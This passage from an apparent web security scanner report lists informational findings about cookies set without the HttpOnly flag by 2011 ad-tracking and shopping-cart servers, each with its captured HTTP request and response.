bkst=KJh5DeNny69RF3WQtBxvMAJhzeHy7Id5QRmNh3oxuGNtPcgCLCESGuxHjl2OzU/UHHxUxx5HacPtXEzTrni8KGknXSSc8Tw7KSIWf3KHK057eb6uK7HTYiVedZYRePS0a6z2mVGHHzxuCG7NVRdWwG2b6+5vRMXsOAqWOar9HraddF1puyPyb6+kM12Mvl0eY4MSs3rLyCyysl2Km4dfjvVG8irIcEVcZ1x9ZM/rOHa19OBbpf+pzgDXAPQrW3N0AKOWvX3OuLGauWJOgHE0DEAdzUqoNKaMChKxf7xmGottueqGjAIr277SesZG/R7qpPsTNFiolEMF34wmG6R2Y/BV+TmeJBLm+rxGtx5EE64HIgO4evoTKUFK0CHQGiZP036QSFhNbKHSOuWwjVNgLFGCl6tf3UKKgd3G8WLAQeYYY60GI6S1MRTM9LoyGb1R/FNtKItXapwdqFTan/CFAy==; bk=iklbKCA+ZqtVIHOf; bkc=KJh56XXgHaWDOdeFBz1Rw8ojAW/DR6CuJCxt43yL7G6SaCquqmpkP2x/iHDNDzgSM0AVLfaQ1r/dLaOv4LjYLuaV7wmTlM+lXHS4mr4zzIX8q0W4IchxYeSzVyg99F7JJ2Nc72+eUL4OwsOQeKizmnmXXcMRDzmIHKZZ/ZZro86C88XYwVurpTbmulmXBrzwdolcMCz9ajDvlHXjvhL5+ZmpWmjXfPBvmiQann/cdDctFZsmNNfl9Bw+yBC1hMbwd5RZdVCTgPPbNEeUNdbZd7GEYo4JAlIUe6+lBD3UNAG4CbDFxAqI1GE84m6PZrXqpEdh73qfa++IBzphtgkITJgZs6rZfUptlnC6lee7S6zYywtBx7EwXSNCM+5m6ghEvSOrhlccGMEcSNzD67fDvOuTdOvs115gcNsIkdjFz2FhDoD6htrwD7I42yG+QEE+gf/5FomrBkhwIICtNoH6l3E6XTC6VRA62bB+6U0IF935Q5dItJWsYBFdt8d25wIBjGUDfrsdg6wuFY2rzf8te7kdu0coXGpCHnBMwfl40xSWRdwuUUaoKbbrKkzCVjdfz8Ff6dTOjAe2+x==

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 14:00:04 GMT
Set-Cookie: bklc=4dc7f364; expires=Wed, 11-May-2011 14:00:04 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 14:00:04 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=c6b/zCA+ZqtVIHOf; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XLgHcWDOdeFpTpcKeup//DGhoYAEYCLwaRVN6RBYy+oBFq0S+u/uS0GiPnVck1LjZwOjYqI9yrk8OAnhRjRzzfkjIf8nVqhSzfld1b28lzpYMiL9v0w+mUYAY2ewM9XbL8b3xMT4aeyBj2q2O4REd7uQdHpZFwSFAJQKOlGZEbplcY8tYceIEcoNkJof3K5JC5kQcT02tKco3u8UoFp/ld7LSwaxcVBxCX2U0bbqR47/zh8fx6U1BzaEWqu5of2Ni72Sci2xlgB1w4Ud3qpOr/vkT7E4NKBu4Ktuaz6uJXWoYdXH7Tay70I2ig+bTltsU2w6qfnqnXS87g+9Q2yE4LvJNJt7g6yJH6Npc7+GOKTFNW/fV52S8Mg+Hm6FtxuSBpBrMLZp4USNuV6fl3aR7/m5CgRnyW/zflt1KU55JIt57fpfmPSSSfU73e8wrXPtg6orGdv5rOmrL8yW26FolBZox+7oJdcouFnoUAKqRFtXIPVbwcIpLzmBAwRd7fIfvc7lthEumT5d4FSnXllhV7mSIKHefRPWQ8ce14qLFqxIpF5CcOTDqGlvZlFN5cF0idfXlhmXlpSwTTe9eW=; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101Df84ByU9WiqOgR=; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Dn+v96WD7u/QZ1x/kAvyLcHC775ZyY/hgkWCCniSDLZLL66QvznrigP4WvpLHHeaH+OYa1PcSI1lVBQ/agqmgG6TNKWXmm5m95N1/FKmEZ8qOUE7X9uvOdlO1OlD6A5clE+3cGUWWGSJ2PiwHOTwK2nEuZ/F9QjsH9HqQWqr4dMN16Lazm+JjRpc/0LXQykTtC3gg1/z1Ord7pFdb22vDzkV4eo3OMsJ9EHkU9GiZ99Z2cqotLZPTodWRo8Ga41WJNoHekHunA9uY33V0y4af1EoCuKcehtKxfgEtxLlt0JKoVL2r5E7uEmQQRRTSM5cyUnMrlgoF14mmTLS5EdyV26m2rB6yNIUGlQcEe6jCuFe4MbGU1gSLNSZ9OBB3PHrOPcMMp17PXL/kPeS+iS+fdm+oJFL4g6Td3tznjW9yQQr1vcrspWtmQGJv1mBei1/24wPC4mKEFtfIx5jnl9d; expires=Sat, 05-Nov-2011 14:00:04 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 14:00:04 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
10.124. http://tap.rubiconproject.com/oz/sensor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/sensor?p=rubicon&pc=8201/13264&cd=false&xt=19&k=shakin'+stevens:144,irish+times:136,n+kane:104,sufjan+stevens:104,siobh+n:104,stevens:74,irish+time:68,computer+screen:64,reflects+order:64,play+reflects:64,stevens+plays:64,war+photographer's:64,s+grid:64,photographer's+world:64,dublin+s:64,harding+s:64,grid+play:64,s+olympia:64,screen+near:64,shop+around:64,car+finance:64,plays+dublin:64,war+photographer:52,stevens+realise:40,health+problems:40,shows+can:40,shakin'+steven:40,can+expect:40,1980s+janet:40,dublin+shows:40,janet+jackson:40,recent+health:40,upcoming+dublin:40,mid+1980s:40,prince+vibe:40,made+sufjan:40,frail+gift:40,tells+siobh:40,problems+made:40,irish:38,&t=Shakin'+Stevens+-+The+Irish+Times+-+Fri,+May+06,+2011 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; xdp_ti="2 May 2011 12:48:41 GMT"; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; dq=25|7|18|0; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7856/12590; rdk2=0; ses2=12590^2&13549^1; csi2=3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 204 No Content
Date: Mon, 09 May 2011 14:07:04 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 08-May-2012 14:07:04 GMT; Path=/
Set-Cookie: dq=26|7|19|0; Expires=Tue, 08-May-2012 14:07:04 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

10.125. http://trgca.opt.fimserve.com/fp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgca.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12 HTTP/1.1
Host: trgca.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Date: Mon, 09 May 2011 14:01:09 GMT
Connection: close
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;
10.126. http://va.px.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57145&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuH4/o1ZgFHi/7P571gUGDX+H1/4jsWA0QLM55LhmH0DJPscKts+fwFYFsznEuFYeZYVKNv5vQ0oy6DBYMBgwQAUvXeAVYBJYsuFX2+RRa98ZgGqXY8m+gooyiTxbNEPFNEV80HmTu47jSK68z7ILbPmr0WIAgA1izvV"; io_freq_p1="eJzjEudY4CLAJPH/2fx3LAoMGgwGTBbPQWwuYY6rEQKMEp3f26ASDBYMQMH1rkDVWy78eosseDxQgFliPZrgtlCg9sl9p1EE97oABWfNX4sQBACAmCKB"; dp_rec="{\"1\": 1304340350+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304340362+ \"4\": 1304340367}"

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:05:46 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiJz7A2TcRBUg88VuZqChO4E27rp3BGgoEwcHUGpjMVDqyQWQ1SfBut/uBum78B3EPnQERM4Eizf/B5n0jwPIbAIz9/sBmRf3guRe7gORa/czAgAW/EAt";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 08-May-2012 14:05:46 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268638&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

10.127. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /VendorFeeds/Alvendify/AlvendaImpression.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /VendorFeeds/Alvendify/AlvendaImpression.aspx?storeId=RubiconRemarketing_ThomsonReuters HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; userName=6T3tjQn4ak8MTT5wHhGAoQ%3d%3d; LastKnownSiteId=1; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%2C%5B%27Referrers%27%2C%271303859618330%27%5D%2C%5B%27Referrers%27%2C%271304026008789%27%5D%2C%5B%27Referrers%27%2C%271304553717621%27%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:53 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: ASP.NET_SessionId=gscizvtkj1igc3awnyt43zpc; path=/; HttpOnly
Set-Cookie: s_id=gscizvtkj1igc3awnyt43zpc; path=/
Set-Cookie: Alvendified=widgetId=RubiconRemarketing_ThomsonReuters&Impression=RubiconRemarketing_ThomsonReuters&Expansion=&PromCode=636051L46432&FirstImpression=5/9/2011 9:06:53 AM&ImpressionDomain0=167.68.225.189; expires=Wed, 08-Jun-2011 14:06:53 GMT; path=/
Cache-Control: private
Content-Type: image/jpeg
Content-Length: 631

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222..........."..............................
...[SNIP]...
10.128. http://www.burstbeacon.com/view/103170/64948/182030/318088/3050/2D1A28EF/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstbeacon.com
Path:   /view/103170/64948/182030/318088/3050/2D1A28EF/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /view/103170/64948/182030/318088/3050/2D1A28EF/ HTTP/1.1
Host: www.burstbeacon.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:03 GMT
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: /BC=V0GMw0P_d0jsN1H9100mQ25BB; path=/; expires=Mon, 08-Aug-2011 14:01:03 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
10.129. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Set-Cookie: /BC3=.P_d.; path=/
Set-Cookie: /SO=:201:; path=/
Set-Cookie: /PC=0; path=/; expires=Mon, 16-May-2011 14:00:59 GMT
Set-Cookie: /SC=0-2vc.1; path=/
Content-Length: 1393


document.write('<IFR'+'AME SRC="http://ad.doubleclick.net/adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI
...[SNIP]...
10.130. http://www.burstnet.com/enlightn/7578//12A4/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7578//12A4/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enlightn/7578//12A4/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg; /BC3=.P_d.; /SO=:201:; /PC=0; /SC=0-2vc.1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Mon, 09 May 2011 14:01:03 GMT
Content-Length: 43
Connection: close
Set-Cookie: TID=16sfssv0tfhb31; path=/; expires=Sun, 07-Aug-2011 14:01:03 GMT; domain=.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=16g.1Elg; path=/; expires=Wed, 09-May-2012 14:01:03 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;
10.131. http://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-local/cart.cgi?2akrshop2_AKR074VINYL HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:25 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950348; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:12:28 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75AC132BC7478C7307DEBD3D97FA4A6E72CA22BF32FAF94F13; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:12:28 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
10.132. http://www.ccnow.com/cgi-local/sc_cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-local/sc_cart.cgi?8147444662139294 HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:30 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950050; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
10.133. https://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/ HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:44 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950065; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:45 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75D81F41DED68942DF4467139B51A38206; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:07:45 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
